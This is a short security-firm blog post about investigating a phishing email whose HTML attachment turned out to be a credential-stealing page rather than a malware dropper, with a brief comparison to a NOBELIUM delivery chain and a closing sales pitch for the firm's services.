Credential Stealing Email Located
We recently had a phishing investigation into an email with an HTML attachment that caught our eye. The reason being is that Microsoft just recently posted about an ongoing attack from NOBELIUM which had a similar delivery technique to this investigation. The NOBELIUM attack structure was Phishing Email > HTML attachment > HTML Smuggling > Drop an ISO which drops an LNK file that will execute the Cobalt Strike Beacon loader. There’s a bit more to it than that but the HTML smuggling is where the path’s diverged with this attack luckily.
After we obtained the email from the client, we were able to dig into what was going on inside of the HTML attachment. The HTML was ‘obfuscated’, well when I say obfuscated, I really mean they “escaped” the characters in the document, something that is common with web requests. Very trivially, we were able to get the plaintext of the document and started to dig deeper into the functionality.
We did not find any evidence of malware or a dropper functionality inside of the HTML file therefore our best recommendation was to change the affected user’s passwords.
Speak With A MegaplanIT Expert
We look forward to talking to you about your upcoming Security Testing, Compliance Assessments, and Managed Security Services priorities. Looking to double-check if your digital infrastructure can withstand the latest cyber threats? The MegaplanIT team ready to help, Set up a meeting time at the link below.